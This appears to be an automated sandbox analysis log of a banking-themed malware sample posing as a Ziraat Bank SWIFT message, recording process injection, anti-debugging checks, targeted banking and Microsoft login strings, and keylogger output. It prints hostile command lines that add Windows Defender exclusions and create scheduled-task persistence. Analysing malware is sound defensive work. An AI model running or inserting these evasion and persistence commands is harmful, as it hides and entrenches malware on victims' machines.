Source: C:\Users\user\AppData\Local\Temp\build.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\XClient.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\XClient.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XClient.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XClient.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Thread delayed: delay time: 922337203685477

Source: build.exe, 00000009.00000002.2645035144.0000000004220000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: build.exe, 00000009.00000002.2645035144.0000000004220000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: XClient.exe, 00000008.00000002.2692349903.0000000015DBD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: fyRCP0+EdpvMCID9CQFv3RwgAFRi/JvPhC23QwPaERsb8sxpF/wpXfjXJJ/2a8mn/g5J
Source: build.exe, 00000009.00000002.2645035144.0000000004220000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: build.exe, 00000009.00000002.2645035144.000000000410A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: build.exe, 00000009.00000002.2645035144.000000000410A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: build.exe, 00000009.00000002.2645035144.000000000410A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: build.exe, 00000009.00000002.2645035144.000000000410A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: XClient.exe, 00000008.00000002.2692349903.0000000015BDD000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.000000000336D000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.000000000335B000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.00000000032CB000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000015DBD000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.00000000032E5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: cct8Np18jeBD9vnLOiQEmUsGIg3XbJv/rvNack+CTx2AEnzIQElC5dQhuHrb/Hlb9Lr/
Source: build.exe, 00000009.00000002.2645035144.0000000004220000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: build.exe, 00000009.00000002.2645035144.0000000004220000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: build.exe, 00000009.00000002.2645035144.000000000410A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: build.exe, 00000009.00000002.2645035144.0000000004220000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: build.exe, 00000009.00000002.2645035144.0000000004220000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: build.exe, 00000009.00000002.2645035144.000000000410A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: build.exe, 00000009.00000002.2645035144.000000000410A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: build.exe, 00000009.00000002.2645035144.000000000410A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: build.exe, 00000009.00000002.2645035144.000000000410A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: build.exe, 00000009.00000002.2645035144.0000000004220000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: build.exe, 00000009.00000002.2645035144.000000000410A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: build.exe, 00000009.00000002.2645035144.000000000410A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: build.exe, 00000009.00000002.2645035144.0000000004220000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: build.exe, 00000009.00000002.2645035144.0000000004220000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: build.exe, 00000009.00000002.2645035144.000000000410A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: build.exe, 00000009.00000002.2645035144.0000000004220000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: build.exe, 00000009.00000002.2645035144.000000000410A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: build.exe, 00000009.00000002.2645035144.000000000410A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: build.exe, 00000009.00000002.2645035144.0000000004220000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: build.exe, 00000009.00000002.2645035144.000000000410A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: build.exe, 00000009.00000002.2645035144.0000000004220000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: build.exe, 00000009.00000002.2645035144.0000000004220000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: build.exe, 00000009.00000002.2645035144.000000000410A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: build.exe, 00000009.00000002.2645035144.0000000004220000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: build.exe, 00000009.00000002.2645035144.0000000004220000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: build.exe, 00000009.00000002.2645035144.0000000004220000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: build.exe, 00000009.00000002.2645035144.000000000410A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: build.exe, 00000009.00000002.2645035144.000000000410A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: build.exe, 00000009.00000002.2645035144.0000000004220000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: XClient.exe, 00000008.00000002.2927137244.000000001B85E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlln5_
Source: build.exe, 00000009.00000002.2645035144.000000000410A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: build.exe, 00000009.00000002.2645035144.000000000410A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: build.exe, 00000009.00000002.2645035144.000000000410A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: build.exe, 00000009.00000002.2645035144.000000000410A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: build.exe, 00000009.00000002.2645035144.000000000410A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: build.exe, 00000009.00000002.2714774589.0000000005DD0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: build.exe, 00000009.00000002.2645035144.0000000004220000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: build.exe, 00000009.00000002.2645035144.000000000410A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: build.exe, 00000009.00000002.2645035144.000000000410A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: build.exe, 00000009.00000002.2645035144.0000000004220000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: build.exe, 00000009.00000002.2645035144.000000000410A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: build.exe, 00000009.00000002.2645035144.000000000410A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: build.exe, 00000009.00000002.2645035144.0000000004220000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: build.exe, 00000009.00000002.2645035144.000000000410A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: build.exe, 00000009.00000002.2645035144.0000000004220000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: apihost.exe, 0000001B.00000002.4622933570.0000000044056000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllo
Source: build.exe, 00000009.00000002.2645035144.000000000410A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: build.exe, 00000009.00000002.2645035144.000000000410A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: XClient.exe, 00000008.00000002.2692349903.0000000015BDD000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2692349903.0000000015DBD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: G3vGPPSpX44L/jTma0hU/dcHgFsN7nnKOV+v8Vz111QEgoLHPe2z1bFPvSFHGBgBoLb1
Source: build.exe, 00000009.00000002.2645035144.0000000004220000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: build.exe, 00000009.00000002.2645035144.0000000004220000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: build.exe, 00000009.00000002.2645035144.0000000004220000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: build.exe, 00000009.00000002.2645035144.0000000004220000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: build.exe, 00000009.00000002.2645035144.0000000004220000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: build.exe, 00000009.00000002.2645035144.0000000004220000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: build.exe, 00000009.00000002.2645035144.0000000004220000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: build.exe, 00000009.00000002.2645035144.0000000004220000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: build.exe, 00000009.00000002.2645035144.000000000410A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: build.exe, 00000009.00000002.2645035144.0000000004220000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process queried: DebugPort

Source: C:\Users\user\AppData\Local\Temp\build.exe

Code function: 9_2_069E57D0 LdrInitializeThunk,

9_2_069E57D0

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe"
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Memory written: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Memory written: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe base: 400000 value starts with: 4D5A

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YkxAHNcqEmoeLS" /XML "C:\Users\user\AppData\Local\Temp\tmp89AD.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process created: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process created: C:\Users\user\AppData\Local\Temp\XClient.exe "C:\Users\user\AppData\Local\Temp\XClient.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 03:07 /du 23:59 /sc daily /ri 1 /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YkxAHNcqEmoeLS" /XML "C:\Users\user\AppData\Local\Temp\tmp9D06.tmp"
Source: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe	Process created: C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe "C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe"

Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager(
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: [ -- Program Manager --
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.00000000030B2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 9<b>[ Program Manager]</b> (26/11/2024 03:02:54)<br>{Win}rX
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerxD
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: [ -- Program Manager -- ]

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Queries volume information: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
